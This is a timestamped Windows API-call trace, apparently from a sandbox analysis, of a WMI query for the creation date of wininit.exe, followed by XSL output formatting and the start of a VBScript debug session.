[0565.779] memcpy (in: _Dst=0x2eef66, _Src=0x313818, _Size=0x5a | out: _Dst=0x2eef66) returned 0x2eef66
[0565.779] free (_Block=0x1895a0)
[0565.779] lstrlenW (lpString="LIST") returned 4
[0565.779] lstrlenW (lpString="get") returned 3
[0565.779] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="LIST", cchCount2=4) returned 1
[0565.779] malloc (_Size=0x18) returned 0x1895a0
[0565.779] malloc (_Size=0x18) returned 0x1896e0
[0565.779] SysStringLen (param_1="Q9IATRKPRH") returned 0x43
[0565.779] SysStringLen (param_1="") returned 0x18
[0565.779] memcpy (in: _Dst=0x2ef008, _Src=0x2eef38, _Size=0x88 | out: _Dst=0x2ef008) returned 0x2ef008
[0565.779] memcpy (in: _Dst=0x2ef08e, _Src=0x2fa038, _Size=0x32 | out: _Dst=0x2ef08e) returned 0x2ef08e
[0565.779] free (_Block=0x189680)
[0565.780] free (_Block=0x1895a0)
[0565.780] free (_Block=0x189580)
[0565.780] ??1CHString@@QEAA@XZ () returned 0x7fef5b8c96c
[0565.780] malloc (_Size=0x18) returned 0x189580
[0565.780] SysStringLen (param_1=" PROCESS where name="wininit.exe" get creationdate ") returned 0x62
[0565.780] SysStringLen (param_1="Q9IATRKPRH") returned 0x5b
[0565.780] memcpy (in: _Dst=0x36b408, _Src=0x36a2a8, _Size=0xc6 | out: _Dst=0x36b408) returned 0x36b408
[0565.780] memcpy (in: _Dst=0x36b4cc, _Src=0x2ef008, _Size=0xb8 | out: _Dst=0x36b4cc) returned 0x36b4cc
[0565.780] free (_Block=0x189760)
[0565.780] ??0CHString@@QEAA@XZ () returned 0xaf5d0
[0565.780] malloc (_Size=0x18) returned 0x189760
[0565.780] malloc (_Size=0x18) returned 0x1895a0
[0565.780] malloc (_Size=0x18) returned 0x189680
[0565.781] malloc (_Size=0x18) returned 0x189720
[0565.781] malloc (_Size=0x18) returned 0x189780
[0565.781] malloc (_Size=0x18) returned 0x189640
[0565.781] malloc (_Size=0x18) returned 0x1897a0
[0565.781] malloc (_Size=0x18) returned 0x18da70
[0565.781] memcpy_s (in: _Destination=0xaf4d0, _DestinationSize=0xe, _Source=0x36c118, _SourceSize=0xc | out: _Destination=0xaf4d0) returned 0x0
[0565.781] lstrlenW (lpString="&") returned 1
[0565.781] lstrlenW (lpString="&") returned 5
[0565.781] lstrlenW (lpString="<") returned 1
[0565.781] lstrlenW (lpString="<") returned 4
[0565.781] lstrlenW (lpString=">") returned 1
[0565.781] lstrlenW (lpString=">") returned 4
[0565.781] lstrlenW (lpString="'") returned 1
[0565.781] lstrlenW (lpString="'") returned 6
[0565.781] lstrlenW (lpString="\"") returned 1
[0565.781] lstrlenW (lpString=""") returned 6
[0565.782] malloc (_Size=0x18) returned 0x18da90
[0565.782] free (_Block=0x18da70)
[0565.782] malloc (_Size=0x18) returned 0x18da70
[0565.782] memcpy_s (in: _Destination=0xaf4d0, _DestinationSize=0xe, _Source=0x36c118, _SourceSize=0xc | out: _Destination=0xaf4d0) returned 0x0
[0565.782] lstrlenW (lpString="&") returned 1
[0565.782] lstrlenW (lpString="&") returned 5
[0565.782] lstrlenW (lpString="<") returned 1
[0565.782] lstrlenW (lpString="<") returned 4
[0565.782] lstrlenW (lpString=">") returned 1
[0565.782] lstrlenW (lpString=">") returned 4
[0565.782] lstrlenW (lpString="'") returned 1
[0565.782] lstrlenW (lpString="'") returned 6
[0565.782] lstrlenW (lpString="\"") returned 1
[0565.782] lstrlenW (lpString=""") returned 6
[0565.782] malloc (_Size=0x18) returned 0x18dab0
[0565.783] free (_Block=0x18da70)
[0565.783] malloc (_Size=0x18) returned 0x18da70
[0565.783] memcpy_s (in: _Destination=0xaf4d0, _DestinationSize=0xe, _Source=0x36c118, _SourceSize=0x6 | out: _Destination=0xaf4d0) returned 0x0
[0565.783] lstrlenW (lpString="&") returned 1
[0565.783] lstrlenW (lpString="&") returned 5
[0565.783] lstrlenW (lpString="<") returned 1
[0565.783] lstrlenW (lpString="<") returned 4
[0565.783] lstrlenW (lpString=">") returned 1
[0565.783] lstrlenW (lpString=">") returned 4
[0565.783] lstrlenW (lpString="'") returned 1
[0565.783] lstrlenW (lpString="'") returned 6
[0565.783] lstrlenW (lpString="\"") returned 1
[0565.783] lstrlenW (lpString=""") returned 6
[0565.783] malloc (_Size=0x18) returned 0x18dad0
[0565.784] free (_Block=0x18da70)
[0565.784] malloc (_Size=0x18) returned 0x18da70
[0565.784] memcpy_s (in: _Destination=0xaf4d0, _DestinationSize=0xe, _Source=0x36c118, _SourceSize=0x6 | out: _Destination=0xaf4d0) returned 0x0
[0565.784] lstrlenW (lpString="&") returned 1
[0565.784] lstrlenW (lpString="&") returned 5
[0565.784] lstrlenW (lpString="<") returned 1
[0565.784] lstrlenW (lpString="<") returned 4
[0565.784] lstrlenW (lpString=">") returned 1
[0565.784] lstrlenW (lpString=">") returned 4
[0565.784] lstrlenW (lpString="'") returned 1
[0565.784] lstrlenW (lpString="'") returned 6
[0565.784] lstrlenW (lpString="\"") returned 1
[0565.784] lstrlenW (lpString=""") returned 6
[0565.784] malloc (_Size=0x18) returned 0x18daf0
[0565.785] free (_Block=0x18da70)
[0565.785] malloc (_Size=0x18) returned 0x18da70
[0565.785] malloc (_Size=0x20) returned 0x18ceb0
[0565.785] memcpy_s (in: _Destination=0x18ceb0, _DestinationSize=0x1e, _Source=0x36c118, _SourceSize=0x14 | out: _Destination=0x18ceb0) returned 0x0
[0565.785] lstrlenW (lpString="&") returned 1
[0565.785] lstrlenW (lpString="&") returned 5
[0565.785] lstrlenW (lpString="<") returned 1
[0565.785] lstrlenW (lpString="<") returned 4
[0565.785] lstrlenW (lpString=">") returned 1
[0565.785] lstrlenW (lpString=">") returned 4
[0565.785] lstrlenW (lpString="'") returned 1
[0565.785] lstrlenW (lpString="'") returned 6
[0565.785] lstrlenW (lpString="\"") returned 1
[0565.785] lstrlenW (lpString=""") returned 6
[0565.785] malloc (_Size=0x18) returned 0x18db10
[0565.786] free (_Block=0x18da70)
[0565.786] free (_Block=0x18ceb0)
[0565.786] malloc (_Size=0x18) returned 0x18da70
[0565.786] malloc (_Size=0x20) returned 0x18ceb0
[0565.786] memcpy_s (in: _Destination=0x18ceb0, _DestinationSize=0x1e, _Source=0x36c118, _SourceSize=0x10 | out: _Destination=0x18ceb0) returned 0x0
[0565.786] lstrlenW (lpString="&") returned 1
[0565.786] lstrlenW (lpString="&") returned 5
[0565.786] lstrlenW (lpString="<") returned 1
[0565.787] lstrlenW (lpString="<") returned 4
[0565.787] lstrlenW (lpString=">") returned 1
[0565.787] lstrlenW (lpString=">") returned 4
[0565.787] lstrlenW (lpString="'") returned 1
[0565.787] lstrlenW (lpString="'") returned 6
[0565.787] lstrlenW (lpString="\"") returned 1
[0565.787] lstrlenW (lpString=""") returned 6
[0565.787] malloc (_Size=0x18) returned 0x18db30
[0565.787] free (_Block=0x18da70)
[0565.787] free (_Block=0x18ceb0)
[0565.788] malloc (_Size=0x18) returned 0x18da70
[0565.788] memcpy_s (in: _Destination=0xaf4d0, _DestinationSize=0xe, _Source=0x36c118, _SourceSize=0xc | out: _Destination=0xaf4d0) returned 0x0
[0565.788] lstrlenW (lpString="&") returned 1
[0565.788] lstrlenW (lpString="&") returned 5
[0565.788] lstrlenW (lpString="<") returned 1
[0565.788] lstrlenW (lpString="<") returned 4
[0565.788] lstrlenW (lpString=">") returned 1
[0565.788] lstrlenW (lpString=">") returned 4
[0565.788] lstrlenW (lpString="'") returned 1
[0565.788] lstrlenW (lpString="'") returned 6
[0565.788] lstrlenW (lpString="\"") returned 1
[0565.788] lstrlenW (lpString=""") returned 6
[0565.788] malloc (_Size=0x18) returned 0x18db50
[0565.789] free (_Block=0x18da70)
[0565.789] ?Format@CHString@@QEAAXPEBGZZ () returned 0x37dfdc
[0565.790] malloc (_Size=0x18) returned 0x18da70
[0565.790] ??1CHString@@QEAA@XZ () returned 0x6601
[0565.790] free (_Block=0x18db50)
[0565.790] free (_Block=0x18db30)
[0565.790] free (_Block=0x18db10)
[0565.790] free (_Block=0x1897a0)
[0565.790] free (_Block=0x18daf0)
[0565.790] free (_Block=0x18da90)
[0565.791] free (_Block=0x18dab0)
[0565.791] free (_Block=0x189640)
[0565.791] free (_Block=0x189780)
[0565.791] free (_Block=0x18dad0)
[0565.791] free (_Block=0x189720)
[0565.791] free (_Block=0x189680)
[0565.791] free (_Block=0x189760)
[0565.791] free (_Block=0x1895a0)
[0565.791] malloc (_Size=0x18) returned 0x1895a0
[0565.791] SysStringLen (param_1=" PROCESS where name="wininit.exe" get creationdate Q9IATRKPRH") returned 0xbd
[0565.791] SysStringLen (param_1="root\\cimv2root\\cliIMPERSONATEPKTPRIVACYms_409ENABLEOFFN/AOFFOFFSTDOUTN/AON") returned 0x173
[0565.791] memcpy (in: _Dst=0x369798, _Src=0x36b408, _Size=0x17c | out: _Dst=0x369798) returned 0x369798
[0565.791] memcpy (in: _Dst=0x369912, _Src=0x36b5a8, _Size=0x2e8 | out: _Dst=0x369912) returned 0x369912
[0565.792] free (_Block=0x189580)
[0565.792] malloc (_Size=0x18) returned 0x189580
[0565.792] malloc (_Size=0x18) returned 0x189760
[0565.792] SysStringLen (param_1=" PROCESS where name="wininit.exe" get creationdate Q9IATRKPRHroot\\cimv2root\\cliIMPERSONATEPKTPRIVACYms_409ENABLEOFFN/AOFFOFFSTDOUTN/AON") returned 0x230
[0565.792] SysStringLen (param_1="") returned 0xa
[0565.792] memcpy (in: _Dst=0x36c948, _Src=0x369798, _Size=0x462 | out: _Dst=0x36c948) returned 0x36c948
[0565.792] memcpy (in: _Dst=0x36cda8, _Src=0x36c118, _Size=0x16 | out: _Dst=0x36cda8) returned 0x36cda8
[0565.792] free (_Block=0x1895a0)
[0565.792] free (_Block=0x189580)
[0565.792] free (_Block=0x189740)
[0565.792] free (_Block=0x1896e0)
[0565.792] free (_Block=0x18da70)
[0565.793] ??1CHString@@QEAA@XZ () returned 0x303e1201
[0565.793] malloc (_Size=0x18) returned 0x1896e0
[0565.793] SysStringLen (param_1="") returned 0x0
[0565.793] SysStringLen (param_1="") returned 0x60
[0565.793] memcpy (in: _Dst=0x36a2a8, _Src=0x2a0ac8, _Size=0x2 | out: _Dst=0x36a2a8) returned 0x36a2a8
[0565.793] memcpy (in: _Dst=0x36a2a8, _Src=0x348718, _Size=0xc2 | out: _Dst=0x36a2a8) returned 0x36a2a8
[0565.793] free (_Block=0x189040)
[0565.793] malloc (_Size=0x18) returned 0x189040
[0565.793] SysStringLen (param_1="") returned 0x60
[0565.793] SysStringLen (param_1=" PROCESS where name="wininit.exe" get creationdate Q9IATRKPRHroot\\cimv2root\\cliIMPERSONATEPKTPRIVACYms_409ENABLEOFFN/AOFFOFFSTDOUTN/AON") returned 0x23a
[0565.793] memcpy (in: _Dst=0x36cdd8, _Src=0x36a2a8, _Size=0xc2 | out: _Dst=0x36cdd8) returned 0x36cdd8
[0565.793] memcpy (in: _Dst=0x36ce98, _Src=0x36c948, _Size=0x476 | out: _Dst=0x36ce98) returned 0x36ce98
[0565.793] free (_Block=0x1896e0)
[0565.793] WbemLocator:IUnknown:Release (This=0x308a30) returned 0x0
[0565.794] ?Empty@CHString@@QEAAXXZ () returned 0x7fef5b8c96c
[0565.794] malloc (_Size=0x18) returned 0x1896e0
[0565.795] SysStringLen (param_1="") returned 0x0
[0565.795] SysStringLen (param_1="20240603113412.436800+120") returned 0xc0
[0565.795] memcpy (in: _Dst=0x369798, _Src=0x2f1c88, _Size=0x2 | out: _Dst=0x369798) returned 0x369798
[0565.795] memcpy (in: _Dst=0x369798, _Src=0x36a108, _Size=0x182 | out: _Dst=0x369798) returned 0x369798
[0565.795] free (_Block=0x189560)
[0565.795] _kbhit () returned 0x0
[0565.798] malloc (_Size=0x18) returned 0x189560
[0565.798] SysStringLen (param_1=" PROCESS where name="wininit.exe" get creationdate Q9IATRKPRHroot\\cimv2root\\cliIMPERSONATEPKTPRIVACYms_409ENABLEOFFN/AOFFOFFSTDOUTN/AON") returned 0x29a
[0565.798] SysStringLen (param_1="20240603113412.436800+120") returned 0xc0
[0565.798] memcpy (in: _Dst=0x36d328, _Src=0x36cdd8, _Size=0x536 | out: _Dst=0x36d328) returned 0x36d328
[0565.798] memcpy (in: _Dst=0x36d85c, _Src=0x369798, _Size=0x182 | out: _Dst=0x36d85c) returned 0x36d85c
[0565.799] free (_Block=0x189040)
[0565.799] malloc (_Size=0x18) returned 0x189040
[0565.799] malloc (_Size=0x18) returned 0x189740
[0565.799] SysStringLen (param_1=" PROCESS where name="wininit.exe" get creationdate Q9IATRKPRHroot\\cimv2root\\cliIMPERSONATEPKTPRIVACYms_409ENABLEOFFN/AOFFOFFSTDOUTN/AON20240603113412.436800+120") returned 0x35a
[0565.799] SysStringLen (param_1="") returned 0xa
[0565.799] memcpy (in: _Dst=0x36d9f8, _Src=0x36d328, _Size=0x6b6 | out: _Dst=0x36d9f8) returned 0x36d9f8
[0565.799] memcpy (in: _Dst=0x36e0ac, _Src=0x36c118, _Size=0x16 | out: _Dst=0x36e0ac) returned 0x36e0ac
[0565.799] free (_Block=0x189560)
[0565.799] free (_Block=0x189040)
[0565.799] GetCurrentThreadId () returned 0x440
[0565.799] ??0CHString@@QEAA@PEBG@Z () returned 0xaf6c8
[0565.799] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xaf6c8
[0565.800] lstrlenW (lpString="LIST") returned 4
[0565.800] lstrlenW (lpString="get") returned 3
[0565.800] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="LIST", cchCount2=4) returned 1
[0565.800] lstrlenW (lpString="ASSOC") returned 5
[0565.800] lstrlenW (lpString="get") returned 3
[0565.800] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="ASSOC", cchCount2=5) returned 3
[0565.800] lstrlenW (lpString="GET") returned 3
[0565.800] lstrlenW (lpString="get") returned 3
[0565.800] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="GET", cchCount2=3) returned 2
[0565.800] malloc (_Size=0x20a) returned 0x18d710
[0565.800] GetSystemDirectoryW (in: lpBuffer=0x18d710, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0565.801] free (_Block=0x18d710)
[0565.801] malloc (_Size=0x18) returned 0x189040
[0565.801] malloc (_Size=0x18) returned 0x189560
[0565.801] malloc (_Size=0x18) returned 0x189580
[0565.801] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13
[0565.801] SysStringLen (param_1="\\wbem\\") returned 0x6
[0565.801] memcpy (in: _Dst=0x2fa628, _Src=0x2fa038, _Size=0x28 | out: _Dst=0x2fa628) returned 0x2fa628
[0565.801] memcpy (in: _Dst=0x2fa64e, _Src=0x36c118, _Size=0xe | out: _Dst=0x2fa64e) returned 0x2fa64e
[0565.801] free (_Block=0x189040)
[0565.802] free (_Block=0x189560)
[0565.802] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32
[0565.802] free (_Block=0x189580)
[0565.802] malloc (_Size=0x18) returned 0x189580
[0565.802] malloc (_Size=0x18) returned 0x189560
[0565.802] malloc (_Size=0x18) returned 0x189040
[0565.802] malloc (_Size=0x18) returned 0x1895a0
[0565.802] malloc (_Size=0x18) returned 0x189680
[0565.802] malloc (_Size=0x18) returned 0x189720
[0565.803] lstrlenW (lpString="TABLE") returned 5
[0565.803] lstrlenW (lpString="CSV") returned 3
[0565.803] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CSV", cchCount1=3, lpString2="TABLE", cchCount2=5) returned 1
[0565.803] lstrlenW (lpString="TABLE") returned 5
[0565.803] lstrlenW (lpString="HFORM") returned 5
[0565.803] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="HFORM", cchCount1=5, lpString2="TABLE", cchCount2=5) returned 1
[0565.803] lstrlenW (lpString="TABLE") returned 5
[0565.803] lstrlenW (lpString="HTABLE") returned 6
[0565.804] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="HTABLE", cchCount1=6, lpString2="TABLE", cchCount2=5) returned 1
[0565.804] lstrlenW (lpString="TABLE") returned 5
[0565.804] lstrlenW (lpString="LIST") returned 4
[0565.804] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LIST", cchCount1=4, lpString2="TABLE", cchCount2=5) returned 1
[0565.804] lstrlenW (lpString="TABLE") returned 5
[0565.804] lstrlenW (lpString="MOF") returned 3
[0565.804] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MOF", cchCount1=3, lpString2="TABLE", cchCount2=5) returned 1
[0565.804] lstrlenW (lpString="TABLE") returned 5
[0565.804] lstrlenW (lpString="RAWXML") returned 6
[0565.804] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="RAWXML", cchCount1=6, lpString2="TABLE", cchCount2=5) returned 1
[0565.804] lstrlenW (lpString="TABLE") returned 5
[0565.804] lstrlenW (lpString="TABLE") returned 5
[0565.804] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="TABLE", cchCount1=5, lpString2="TABLE", cchCount2=5) returned 2
[0565.804] SysStringLen (param_1="texttable.xsl") returned 0xd
[0565.804] SysStringLen (param_1="hform.xsl") returned 0x9
[0565.804] SysStringLen (param_1="texttable.xsl") returned 0xd
[0565.805] SysStringLen (param_1="htable.xsl") returned 0xa
[0565.805] SysStringLen (param_1="texttable.xsl") returned 0xd
[0565.805] SysStringLen (param_1="csv.xsl") returned 0x7
[0565.805] SysStringLen (param_1="texttable.xsl") returned 0xd
[0565.805] SysStringLen (param_1="mof.xsl") returned 0x7
[0565.805] SysStringLen (param_1="texttable.xsl") returned 0xd
[0565.805] SysStringLen (param_1="xml.xsl") returned 0x7
[0565.805] malloc (_Size=0x18) returned 0x189780
[0565.805] malloc (_Size=0x18) returned 0x189640
[0565.805] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19
[0565.805] SysStringLen (param_1="\\") returned 0x1
[0565.805] memcpy (in: _Dst=0x2fa628, _Src=0x2fa038, _Size=0x34 | out: _Dst=0x2fa628) returned 0x2fa628
[0565.805] memcpy (in: _Dst=0x2fa65a, _Src=0x36c178, _Size=0x4 | out: _Dst=0x2fa65a) returned 0x2fa65a
[0565.805] free (_Block=0x189780)
[0565.805] malloc (_Size=0x18) returned 0x189780
[0565.806] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\\\") returned 0x1a
[0565.806] SysStringLen (param_1="texttable.xsl") returned 0xd
[0565.806] memcpy (in: _Dst=0x2ef008, _Src=0x2fa628, _Size=0x36 | out: _Dst=0x2ef008) returned 0x2ef008
[0565.806] memcpy (in: _Dst=0x2ef03c, _Src=0x2866c8, _Size=0x1c | out: _Dst=0x2ef03c) returned 0x2ef03c
[0565.806] free (_Block=0x189640)
[0565.806] CreateFileW (lpFileName="C:\\Windows\\system32\\wbem\\\\texttable.xsl" (normalized: "c:\\windows\\system32\\wbem\\texttable.xsl"), dwDesiredAccess=0x0, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x294
[0565.868] CloseHandle (hObject=0x294) returned 1
[0565.868] malloc (_Size=0x30) returned 0x1886c0
[0565.868] malloc (_Size=0x30) returned 0x188700
[0565.869] ??0CHString@@QEAA@PEBG@Z () returned 0xaf428
[0565.869] ?Right@CHString@@QEBA?AV1@H@Z () returned 0xaf420
[0565.869] ??0CHString@@QEAA@PEBG@Z () returned 0xaf478
[0565.869] _wcsicmp (_String1=".xsl", _String2=".xsl") returned 0
[0565.869] ??1CHString@@QEAA@XZ () returned 0x1
[0565.869] ??1CHString@@QEAA@XZ () returned 0x20015f007c0001
[0565.869] ??1CHString@@QEAA@XZ () returned 0x303e1201
[0565.869] malloc (_Size=0x30) returned 0x188740
[0565.869] malloc (_Size=0x20) returned 0x18ceb0
[0565.869] malloc (_Size=0x30) returned 0x188780
[0565.870] free (_Block=0x188740)
[0565.870] free (_Block=0x188700)
[0565.870] free (_Block=0x1886c0)
[0565.871] free (_Block=0x189720)
[0565.871] free (_Block=0x189680)
[0565.871] free (_Block=0x1895a0)
[0565.871] free (_Block=0x189040)
[0565.871] free (_Block=0x189560)
[0565.871] free (_Block=0x189580)
[0565.871] GetCurrentThreadId () returned 0x440
[0565.871] ??0CHString@@QEAA@XZ () returned 0xaf4d0
[0565.871] CoCreateInstance (in: rclsid=0xffa67410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xffa673f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0xffad29e8 | out: ppv=0xffad29e8*=0x1fd71d0) returned 0x0
[0565.874] FreeThreadedDOMDocument:IXMLDOMDocument:loadXML (in: This=0x1fd71d0, bstrXML=" PROCESS where name="wininit.exe" get creationdate Q9IATRKPRHroot\\cimv2root\\cliIMPERSONATEPKTPRIVACYms_409ENABLEOFFN/AOFFOFFSTDOUTN/AON20240603113412.436800+120", isSuccessful=0xaf4b4 | out: isSuccessful=0xaf4b4*=0xffff) returned 0x0
[0565.880] ??0CHString@@QEAA@XZ () returned 0xaf1b0
[0565.880] GetCurrentThreadId () returned 0x440
[0565.880] malloc (_Size=0x20) returned 0x18cee0
[0565.880] malloc (_Size=0x30) returned 0x1886c0
[0565.880] CoCreateInstance (in: rclsid=0xffa67420*(Data1=0x2933bf94, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), pUnkOuter=0x0, dwClsContext=0x15, riid=0xffa67400*(Data1=0x2933bf93, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0xaf1c8 | out: ppv=0xaf1c8*=0x1fd7620) returned 0x0
[0565.895] CoCreateInstance (in: rclsid=0xffa67410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x15, riid=0xffa673f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0xaf1e0 | out: ppv=0xaf1e0*=0x1fdb330) returned 0x0
[0565.896] FreeThreadedDOMDocument:IXMLDOMDocument:put_async (This=0x1fdb330, async=0) returned 0x0
[0565.896] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\\\texttable.xsl") returned 0x4e
[0565.897] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x1fdb330, xmlSource=0xaf380*(varType=0x8, wReserved1=0x1fd, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\\\texttable.xsl", varVal2=0x0), isSuccessful=0xaf478 | out: isSuccessful=0xaf478*=0xffff) returned 0x0
[0565.969] XSLTemplate:IXSLTemplate:putref_stylesheet (This=0x1fd7620, stylesheet=0x1fdb330) returned 0x0
[0566.060] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xacfc0 | out: lpSystemTimeAsFileTime=0xacfc0*(dwLowDateTime=0x6b9b1bd0, dwHighDateTime=0x1dab599))
[0566.060] GetCurrentProcessId () returned 0x520
[0566.060] GetCurrentThreadId () returned 0x440
[0566.060] GetTickCount () returned 0x25d75
[0566.060] QueryPerformanceCounter (in: lpPerformanceCount=0xacfc8 | out: lpPerformanceCount=0xacfc8*=2095910652077) returned 1
[0566.061] malloc (_Size=0x100) returned 0x18aa10
[0566.062] __dllonexit () returned 0x7fef58cbfc0
[0566.062] __dllonexit () returned 0x7fef58cbfa8
[0566.063] __dllonexit () returned 0x7fef58cbfd4
[0566.068] GetUserDefaultLCID () returned 0x409
[0566.069] GetVersion () returned 0x1db10106
[0566.073] ??2@YAPEAX_K@Z () returned 0x18d710
[0566.074] ??2@YAPEAX_K@Z () returned 0x18e240
[0566.075] GetUserDefaultLCID () returned 0x409
[0566.075] GetACP () returned 0x4e4
[0566.075] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.078] GetCurrentThreadId () returned 0x440
[0566.078] ??2@YAPEAX_K@Z () returned 0x18d710
[0566.078] GetCurrentThreadId () returned 0x440
[0566.079] ??2@YAPEAX_K@Z () returned 0x18cf10
[0566.079] ??2@YAPEAX_K@Z () returned 0x188700
[0566.079] ??2@YAPEAX_K@Z () returned 0x18d7f0
[0566.079] ??2@YAPEAX_K@Z () returned 0x188740
[0566.079] GetCurrentThreadId () returned 0x440
[0566.079] ??2@YAPEAX_K@Z () returned 0x18d8c0
[0566.079] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1
[0566.080] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0xaecd0, cchData=6 | out: lpLCData="1252") returned 5
[0566.080] IsValidCodePage (CodePage=0x4e4) returned 1
[0566.081] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x7feff780000
[0566.082] GetProcAddress (hModule=0x7feff780000, lpProcName="CoCreateInstance") returned 0x7feff7a7490
[0566.082] CoCreateInstance (in: rclsid=0x7fef591d5a8*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef591d5b8*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x18e588 | out: ppv=0x18e588*=0x30b4e0) returned 0x0
[0566.082] IUnknown:AddRef (This=0x30b4e0) returned 0x2
[0566.082] GetCurrentProcessId () returned 0x520
[0566.082] GetCurrentThreadId () returned 0x440
[0566.082] GetTickCount () returned 0x25d85
[0566.083] ISystemDebugEventFire:BeginSession (This=0x30b4e0, guidSourceID=0x7fef591d5d8, strSessionName="VBScript:00001312:00001088:00155013") returned 0x0
[0566.083] DllRegisterServer () returned 0x0
[0566.083] GetCurrentThreadId () returned 0x440
[0566.084] realloc (_Block=0x0, _Size=0xc8) returned 0x18d950
[0566.084] memcpy (in: _Dst=0x18d950, _Src=0x7fef5930800, _Size=0x10 | out: _Dst=0x18d950) returned 0x18d950
[0566.084] memcpy (in: _Dst=0x18d960, _Src=0x7fef591f2c8, _Size=0x6 | out: _Dst=0x18d960) returned 0x18d960
[0566.084] memcpy (in: _Dst=0x18d966, _Src=0x7fef591f2d0, _Size=0x18 | out: _Dst=0x18d966) returned 0x18d966
[0566.084] ??2@YAPEAX_K@Z () returned 0x1887c0
[0566.084] malloc (_Size=0x1008) returned 0x18e5d0
[0566.084] ??2@YAPEAX_K@Z () returned 0x18f5e0
[0566.084] malloc (_Size=0x400) returned 0x18f770
[0566.085] malloc (_Size=0x108) returned 0x18ab20
[0566.085] malloc (_Size=0x2008) returned 0x37dfd0
[0566.085] memcpy (in: _Dst=0x37e004, _Src=0x1fe6d12, _Size=0xc | out: _Dst=0x37e004) returned 0x37e004
[0566.085] memcpy (in: _Dst=0x37e044, _Src=0x1fe6d20, _Size=0x10 | out: _Dst=0x37e044) returned 0x37e044
[0566.085] memcpy (in: _Dst=0x37e08c, _Src=0x1fe6e30, _Size=0x6 | out: _Dst=0x37e08c) returned 0x37e08c
[0566.085] memcpy (in: _Dst=0x37e0c4, _Src=0x1fe6e38, _Size=0xa | out: _Dst=0x37e0c4) returned 0x37e0c4
[0566.085] memcpy (in: _Dst=0x37e104, _Src=0x1fe6e4c, _Size=0x10 | out: _Dst=0x37e104) returned 0x37e104
[0566.086] memcpy (in: _Dst=0x37e14c, _Src=0x1fe6e70, _Size=0xc | out: _Dst=0x37e14c) returned 0x37e14c
[0566.086] malloc (_Size=0x208) returned 0x18fb80
[0566.086] memcpy (in: _Dst=0x37e18c, _Src=0x1fe6e90, _Size=0x4 | out: _Dst=0x37e18c) returned 0x37e18c
[0566.086] memcpy (in: _Dst=0x37e1c4, _Src=0x1fe6ea8, _Size=0xa | out: _Dst=0x37e1c4) returned 0x37e1c4
[0566.086] memcpy (in: _Dst=0x37e204, _Src=0x1fe6ebc, _Size=0x10 | out: _Dst=0x37e204) returned 0x37e204
[0566.086] memcpy (in: _Dst=0x37e24c, _Src=0x1fe6ed6, _Size=0x12 | out: _Dst=0x37e24c) returned 0x37e24c
[0566.086] malloc (_Size=0x408) returned 0x37ffe0
[0566.087] memcpy (in: _Dst=0x37e294, _Src=0x1fe6f08, _Size=0x8 | out: _Dst=0x37e294) returned 0x37e294
[0566.087] memcpy (in: _Dst=0x37e2d4, _Src=0x1fe6f30, _Size=0x18 | out: _Dst=0x37e2d4) returned 0x37e2d4
